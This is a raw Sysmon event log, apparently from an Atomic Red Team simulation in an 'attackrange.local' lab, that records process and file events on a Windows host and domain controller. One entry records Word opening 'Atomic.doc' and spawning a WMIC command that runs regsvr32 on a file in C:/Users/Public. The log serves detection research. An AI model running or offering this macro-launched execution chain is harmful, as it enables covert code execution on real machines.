12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293186Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293185Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293184Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293183Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293182Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293181Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293180Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293179Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293178Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293177Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.373{BEA10069-02C1-6088-212A-00000000BB01}34646508C:\Windows\system32\conhost.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293176Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D4AB-6086-4301-00000000BB01}33844212C:\Windows\system32\csrss.exe{BEA10069-02C1-6088-212A-00000000BB01}3464C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293175Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293174Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293173Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293172Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293171Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293170Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(00000145103363F2) 154100x8000000000000000293169Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.364{BEA10069-02C1-6088-202A-00000000BB01}5448C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic.exe process call create 'regsvr32.exe -s C:/Users/Public/mids.pds'C:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o "" 10341000x8000000000000000293168Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:37.358{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441517Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:38.264{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441516Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:38.264{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441515Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:38.029{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B321DF2AF09CCC7B4BDCB02FABC39D8,SHA256=B2F9AA2402F9894CBCF3099988DEC47670679E52768ACA184CE2F0BD27B3B243,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293211Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:38.358{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293210Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:38.120{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B86FA444E89787B4551DBC0C1AA8AABF,SHA256=C13AD72C143C9D1A1DA35323F511FA992C65A97BE9BC81EE58F73EFECD1539D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293209Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:38.120{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBE4E8407A9D271123C4341694D3D6F7,SHA256=F6F5398C908A45106FD510F8A389D2FBAE5E381B1BFAE11948286D911F1F8978,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441523Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:36.668{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62431-false10.0.1.12-8000- 10341000x8000000000000000441522Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:39.265{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441521Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:39.265{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441520Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:39.226{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04ABC85386E41F1189699DAA6F6D8846,SHA256=82414DF20E7C747232E9A8CDF72125F504EA39FAD0CC9F2522CFBB8420E5CFC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441519Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:39.225{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CEE1C1985CD2C15DFB66FB9930D5BE6,SHA256=83BA02FD63D04210EE6946F9B70C4AE3DA223495762C9B174A7A437B3E83AFF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441518Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:39.036{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6714FE3EEF9A77A28BA11C3ECB0BB160,SHA256=6BC4158C164951C32A27B9F6BAE92430099071D15C5057016771FD8E96F114B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293221Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.658{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3FE058FBE99E028FBAF67446AB753158,SHA256=FDF35B351B60E684C364CC7120AFA795BC181FA74DE0A83267757C1BD069F132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293220Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.658{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3FE058FBE99E028FBAF67446AB753158,SHA256=FDF35B351B60E684C364CC7120AFA795BC181FA74DE0A83267757C1BD069F132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293219Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.658{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=15E6B42F36202E7F04DFCA788CAF5203,SHA256=12E9D693FF17D36E0D95359A7F3F87E4B0FD36325207FA38A4AA5CC37E437529,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293218Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.640{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02A2-6088-122A-00000000BB01}6212C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293217Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 